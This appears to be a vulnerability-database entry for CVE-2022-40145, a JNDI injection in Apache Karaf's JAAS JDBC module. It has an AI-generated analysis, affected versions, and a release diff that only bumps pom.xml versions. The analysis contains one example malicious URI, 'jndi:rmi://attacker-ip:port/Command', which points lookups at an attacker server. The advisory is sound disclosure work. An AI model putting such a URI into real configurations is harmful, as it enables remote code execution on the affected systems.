Apache Karaf: JDBC JAAS LDAP injection
Description
Apache Karaf up to 4.4.1/4.3.7 allows RCE by crafting a malicious JNDI LDAP URI in JDBC data source configuration when the attacker controls the LDAP server.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Apache Karaf up to 4.4.1/4.3.7 allows RCE by crafting a malicious JNDI LDAP URI in JDBC data source configuration when the attacker controls the LDAP server.
Vulnerability
Analysis
CVE-2022-40145 is a code injection vulnerability in Apache Karaf's JAAS JDBC login module. The root cause lies in the JDBCUtils#doCreateDatasource method, which calls InitialContext.lookup(jndiName) without validating the scheme of the JNDI name [1]. An attacker can modify the data source URI from the intended osgi: scheme to an arbitrary JNDI URI, such as jndi:rmi://attacker-ip:port/Command, causing the application to perform a remote lookup to an attacker-controlled LDAP or RMI server [2].
Attack
Vector
Exploitation requires that the attacker can control the target LDAP server referenced in the JNDI URL, and that a Karaf configuration uses a JNDI LDAP data source URI. The attacker must also have the ability to modify the options.put(JDBCUtils.DATASOURCE, ...) value in the login module configuration, for example by injecting a malicious payload into the JdbcLoginModuleTest#setup method [1]. Once the malicious URI is set, any subsequent lookup operation triggers the attack.
Impact
Successful exploitation leads to remote code execution (RCE) in the context of the Karaf runtime [1]. An attacker can execute arbitrary commands, potentially gaining full control over the affected Karaf instance. The vulnerability affects all versions of Apache Karaf up to 4.4.1 and 4.3.7 [3].
Mitigation
Apache Karaf has released versions 4.4.2 and 4.3.8 which add a scheme verification in JDBCUtils to reject non-osgi: JNDI URIs for data source creation [2][3]. Users are strongly encouraged to upgrade to at least these fixed versions. There is no known workaround for older releases.
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
org.apache.karaf:apache-karafMaven | < 4.3.8 | 4.3.8 |
org.apache.karaf:apache-karafMaven | >= 4.4.0, < 4.4.2 | 4.4.2 |
Affected products
2- Apache Software Foundation/Apache Karafv5Range: 4.4.0
Patches
3943070f6b4a6[maven-release-plugin] prepare release karaf-4.3.8
238 files changed · +239 −239
archetypes/assembly/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>archetypes</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> </parent> <groupId>org.apache.karaf.archetypes</groupId>
archetypes/blueprint/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>archetypes</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
archetypes/bundle/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>archetypes</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
archetypes/command/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>archetypes</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
archetypes/feature/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>archetypes</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
archetypes/kar/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>archetypes</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
archetypes/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/apache-karaf-minimal/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies</groupId> <artifactId>assemblies</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/apache-karaf/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies</groupId> <artifactId>assemblies</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/features/base/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies.features</groupId> <artifactId>features</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/features/enterprise/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies.features</groupId> <artifactId>features</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/features/framework/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies.features</groupId> <artifactId>features</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies</groupId> <artifactId>assemblies</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/features/specs/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies.features</groupId> <artifactId>features</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/features/spring-legacy/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies.features</groupId> <artifactId>features</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/features/spring/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies.features</groupId> <artifactId>features</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/features/standard/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies.features</groupId> <artifactId>features</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/features/static/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.assemblies.features</groupId> <artifactId>features</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
assemblies/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
audit/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
bom/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
bundle/blueprintstate/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.bundle</groupId> <artifactId>bundle</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
bundle/core/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.bundle</groupId> <artifactId>bundle</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
bundle/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
bundle/springstate/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.bundle</groupId> <artifactId>bundle</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
client/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
config/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
deployer/blueprint/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.deployer</groupId> <artifactId>deployer</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
deployer/features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.deployer</groupId> <artifactId>deployer</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
deployer/kar/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.deployer</groupId> <artifactId>deployer</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
deployer/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
deployer/spring/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.deployer</groupId> <artifactId>deployer</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
deployer/wrap/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.deployer</groupId> <artifactId>deployer</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
diagnostic/boot/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.diagnostic</groupId> <artifactId>diagnostic</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
diagnostic/core/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.diagnostic</groupId> <artifactId>diagnostic</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
diagnostic/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
docker/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf</groupId> <artifactId>karaf</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
event/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <artifactId>karaf</artifactId> <groupId>org.apache.karaf</groupId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-blueprint-example/karaf-blueprint-example-client/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-blueprint-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-blueprint-example/karaf-blueprint-example-common/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-blueprint-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-blueprint-example/karaf-blueprint-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-blueprint-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-blueprint-example/karaf-blueprint-example-provider/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-blueprint-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-blueprint-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-branding-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-bundle-example/karaf-bundle-example-client/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-bundle-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-bundle-example/karaf-bundle-example-common/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-bundle-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-bundle-example/karaf-bundle-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-bundle-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-bundle-example/karaf-bundle-example-provider/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-bundle-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-bundle-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-camel-example/karaf-camel-example-blueprint/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-camel-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-camel-example/karaf-camel-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-camel-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-camel-example/karaf-camel-example-java/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-camel-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-camel-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-cdi-example/karaf-cdi-example-api/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-cdi-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-cdi-example/karaf-cdi-example-consumer/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-cdi-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-cdi-example/karaf-cdi-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-cdi-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-cdi-example/karaf-cdi-example-provider/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-cdi-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-cdi-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-command-example/karaf-command-example-api/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-command-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-command-example/karaf-command-example-command/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-command-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-command-example/karaf-command-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-command-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-command-example/karaf-command-example-provider/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-command-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-command-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-config-example/karaf-config-example-blueprint/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-config-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-config-example/karaf-config-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-config-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-config-example/karaf-config-example-listener/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-config-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-config-example/karaf-config-example-managed-factory/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-config-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-config-example/karaf-config-example-managed/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-config-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-config-example/karaf-config-example-scr/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-config-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-config-example/karaf-config-example-static/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-config-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-config-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-deployer-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-docker-example/karaf-docker-example-app/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-docker-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-docker-example/karaf-docker-example-dynamic-dist/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-docker-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-docker-example/karaf-docker-example-static-dist/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-docker-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-docker-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-dump-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-http-resource-example/karaf-http-resource-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-http-resource-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-http-resource-example/karaf-http-resource-example-whiteboard/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-http-resource-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-http-resource-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-itest-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jaas-example/karaf-jaas-example-app/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jaas-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jaas-example/karaf-jaas-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jaas-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jaas-example/karaf-jaas-example-wab/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jaas-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jaas-example/karaf-jaas-example-war/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jaas-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jaas-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jdbc-example/karaf-jdbc-example-api/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jdbc-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jdbc-example/karaf-jdbc-example-command/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jdbc-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jdbc-example/karaf-jdbc-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jdbc-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jdbc-example/karaf-jdbc-example-provider/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jdbc-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jdbc-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jms-example/karaf-jms-example-command/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jms-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jms-example/karaf-jms-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jms-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jms-example/pom.xml+1 −1 modified@@ -25,7 +25,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-command/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example</artifactId> - <version>4.3.8-SNAPSHOT</version> + <version>4.3.8</version> <relativePath>../pom.xml</relativePath> </parent>
